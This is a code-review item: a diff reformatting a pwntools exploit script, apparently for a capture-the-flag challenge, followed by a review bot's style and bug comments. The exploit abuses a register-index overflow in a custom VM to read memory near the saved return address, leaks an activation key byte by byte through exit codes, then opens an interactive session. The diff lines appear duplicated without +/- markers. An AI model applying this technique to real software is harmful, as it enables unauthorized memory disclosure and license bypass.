Reformat exploit.py.
@@ -114,6 +114,7 @@ def exec_program(p: pwnlib.tubes.remote.remote, program: bytes) -> int:
log.info(f"As char: {bytes([exit_code]).decode()}")
log.info(f"As char: {bytes([exit_code]).decode()}")
return exit_code
return exit_code
def extract_premium_key():
def extract_premium_key():
offset_saved_rip_to_activation_key = 0x396d
offset_saved_rip_to_activation_key = 0x396d
@@ -122,21 +123,22 @@ def extract_premium_key():
p = connect(b"", False)
p = connect(b"", False)
i = 0
i = 0
while i < 0x80:
while i < 0x80:
program = instr_r(Opcode.ADD, Register.K, Register.A) # arbitrary
# mov r8, rsp
program += instr_i(Opcode.LOADI, Register.A, 0x90909090)
program = load_rsp(Register.G)
# mov rcx, r8 (rcx, because we overflow the highest bit of register_id[r8])
program = load_rsp(Register.G) # mov r8, rsp
program += instr_r(Opcode.ADD, Register.A, Register.G)
program += instr_r(Opcode.ADD, Register.A,
# add r9, [rcx]
Register.G) # mov rcx, r8 (rcx, because we overflow the highest bit of register_id[r8])
program += arbitrary_read(Register.H, Register.C)
program += arbitrary_read(Register.H, Register.C) # add r9, [rcx]
# mov rdx, r9 (rdx, because we again overflow the highest bit of register_id[r9])
program += instr_r(Opcode.ADD, Register.C,
program += instr_r(Opcode.ADD, Register.C, Register.H)
Register.H) # mov rdx, r9 (rdx, because we again overflow the highest bit of register_id[r9])
# add rdx, offset_saved_rip_to_activation_key
program += instr_i(Opcode.ADDI, Register.D,
program += instr_i(Opcode.ADDI, Register.D, offset_saved_rip_to_activation_key + i)
offset_saved_rip_to_activation_key + i) # add rdx, offset_saved_rip_to_activation_key
# add r10, [rdx]
program += arbitrary_read(Register.I, Register.D) # add r10, [rdx]
program += arbitrary_read(Register.I, Register.D)
program += instr_r(Opcode.ADD, Register.D,
# mov rbx, r10 (rbx, because we again overflow the highest bit of register_id[r10])
Register.I) # mov rbx, r10 (rbx, because we again overflow the highest bit of register_id[r10])
program += instr_r(Opcode.ADD, Register.D, Register.I)
program += instr_r(Opcode.COPY, Register.A, Register.B) # mov rax, rbx
# mov rax, rbx
program += instr_r(Opcode.COPY, Register.A, Register.B)
exit_code = exec_program(p, program)
exit_code = exec_program(p, program)
if exit_code == 0:
if exit_code == 0:
@@ -149,9 +151,11 @@ def extract_premium_key():
p.close()
p.close()
return premium_key
return premium_key
context.log_level = 'warn'
context.log_level = 'warn'
premium_key = extract_premium_key()
premium_key = extract_premium_key()
p = connect(premium_key, True)
p = connect(premium_key, True)
p.interactive()
p.interactive()
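Review bot: `extract_premium_key` at the top of the second hunk still has no docstring, and `offset_saved_rip_to_activation_key = 0x396d` is a bare constant tied to one particular build of the target; the reformat is a good moment to add a line above it such as `# Binary-specific: re-derive this offset whenever the challenge binary is rebuilt` so the value is not reused blindly. The manual `i = 0` / `while i < 0x80` counter reads like a `for i in range(0x80)` loop unless `i` is advanced conditionally in the part of the body that lies outside the hunk; if that is the case, a short comment saying why the counter is manual would save the next reader the same question. Separately, the context line `log.info(f"As char: {bytes([exit_code]).decode()}")` in the first hunk raises `UnicodeDecodeError` for any exit code above 0x7f, so a single non-ASCII byte aborts the whole loop from a log statement; `bytes([exit_code]).decode("ascii", errors="backslashreplace")` keeps the log line total. Both `exec_program` and `extract_premium_key` extend beyond the visible hunks.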